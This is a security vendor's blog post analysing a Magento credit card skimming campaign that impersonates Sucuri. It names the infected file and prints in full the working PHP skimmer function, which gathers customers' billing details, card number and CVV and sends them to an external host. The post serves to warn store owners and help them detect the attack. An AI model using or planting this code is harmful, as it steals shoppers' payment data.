Credit Card Skimmer Impersonating Sucuri, Magento Stores Being Targeted & CC Data Stolen
Published on: November 21, 2020
Kanishk Tagade
5 mins read
With COVID-19 lockdown measures and imminent BFCM & Christmas discounts sale throughout the globe, online shopping is continuing to soar this year and along with it, digital credit card skimmer attacks.
Following our recent report on the Telegram malware campaign, security researchers at Astra Security spotted another ongoing credit card skimming malware campaign that impersonates the security company ‘Sucuri’ to steal sensitive customer information from the infected e-commerce stores. While we’ve tracked this malware targeting Magento stores, however, some traces of the malware have been spotted in other CMSs like Prestashop, OpenCart & WooCommerce too.
What is a digital credit card skimming attack?
A digital credit card skimming attack is a web-based skimming attack where the hackers inject malicious JavaScript code into the websites or e-commerce stores in order to infect them with malware and ultimately steal the credentials and sensitive payment information from website visitors/customers. These digital skimmers’ malicious code is mostly planted at the user input forms present in the payment checkout page of the site that sniffs user inputs or creates an iframe with fake payment forms to steal credit card information of the customers.
Digital skimming has affected hundreds of thousands of websites to date, including high-profile brands such as British Airways, Macy’s, Forbes, NewEgg and Ticketmaster.
Symptoms of the Magento credit card skimming malware
- Customers complaining about unidentified transactions from their credit card after using it on your store.
- Email from your payment provider/bank telling warning about security of your store’s payment gateway.
- Additional payment method added to the store which you do not identify.
- Code containing the term ‘Sucuri’ added in your website, even though you do not use any product with the name.
How hackers are targeting stores and impersonating Sucuri firewall to trick users into giving their payment information
During the analysis of this malware campaign, our research team found that the hackers are actively planting this credit card skimming malware into e-commerce websites (mostly Magneto stores) and tricking site visitors or buyers to enter their sensitive information during the checkout. The malicious credit card skimmer code is located at this file location /app/code/core/Mage/Payment/Model/Method/Cc.php of an infected site.
Here, the attackers are adding a function $this->sucuri_encrypted(); which allows them to exfiltrate the data entered by a user during the checkout process. And the exfiltrated data is being sent to https://www.thebrandstore.gr/js/i.php
The stolen data contains sensitive information of the customers including their first name, last name, address, phone number, and credit card details.
Below is the code sample used in this malware campaign used by the attackers:
function sucuri_encrypted()
{
$info = $this->getInfoInstance();
$object = new Mage_Checkout_Block_Onepage_Billing;
$address1 = $object->getQuote()->getBillingAddress();
$data1 = $address1->getFirstname();
$data2 = $address1->getLastname();
$data3 = $address1->getStreet(1);
$data4 = $address1->getStreet(2);
$data5 = $address1->getCity();
$data6 = $address1->getRegion();
$data7 = $address1->getPostcode();
$data8 = $address1->getCountry();
$data9 = $address1->getTelephone();
$data10 = $info->getCcNumber();
$expyear = substr($info->getCcExpYear(), -2);
$expmonth = $info->getCcExpMonth();
if (strlen($expmonth) == 1) {
$expmonth = '0'.$expmonth;
};
$data11 = $expmonth;
$data12 = $expyear;
$data13 = $info->getCcCid();
$data15 = $_SERVER['SERVER_NAME'];
$data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
//create array of data to be secured
$sucuri_firewall['firstname'] = base64_encode($data1);
$sucuri_firewall['lastname'] = base64_encode($data2);
$sucuri_firewall['address'] = base64_encode($data3);
$sucuri_firewall['address2'] = base64_encode($data4);
$sucuri_firewall['city'] = base64_encode($data5);
$sucuri_firewall['state'] = base64_encode($data6);
$sucuri_firewall['zip'] = base64_encode($data7);
$sucuri_firewall['country'] = base64_encode($data8);
$sucuri_firewall['phone'] = base64_encode($data9);
$sucuri_firewall['cc'] = base64_encode($data10);
$sucuri_firewall['exp'] = base64_encode($data11);
$sucuri_firewall['expyear'] = base64_encode($data12);
$sucuri_firewall['cvv'] = base64_encode($data13);
$sucuri_firewall['email'] = base64_encode($data16);
$sucuri_firewall['dari'] = base64_encode($data15);
$sucuri_firewall['submit'] = 'Submit';
//traverse array and prepare data for posting (key1=value1)
foreach ( $sucuri_firewall as $key => $value) {
$post_items[] = $key . '=' . $value;
}
//create the final string to be posted using implode()
$post_string = implode ('&', $post_items);
//create cURL connection
$curl_connection = curl_init('https://www.thebrandstore.gr/js/i.php');
//set options
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
//set data to be posted
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post_string);
//perform our request
$result = curl_exec($curl_connection);
curl_close($curl_connection);
}
}
}.As you can see in above code, the credit card info stealer adds a function named $this->sucuri_encrypted(); which displays an impersonated Sucuri firewall code.
How to protect your e-commerce store from this malware
E-commerce websites or stores that are infected with this malware may suffer a huge loss in revenue as well as customer trust due to their customers’ sensitive information being stolen here and the legit orders are not getting placed or the payments are not being done. So, It is advised to site owners that they should implement prior security measures in order to protect their sites and customer data against this kind of credit card skimmer and any other malware campaign.
If you are using Astra Security’s application firewall then your e-commerce store is already protected from this attack and other cyber attacks and vulnerabilities like SQLi, XSS, CSRF, LFI, RFI, credit card hacks, spam, bad bots, etc. Further, Security experts have long been recommending regular malware scanning as a key security measure for the safety of websites, it is time you primed your websites with due security measures to keep it protected at all times.
Kanishk Tagade
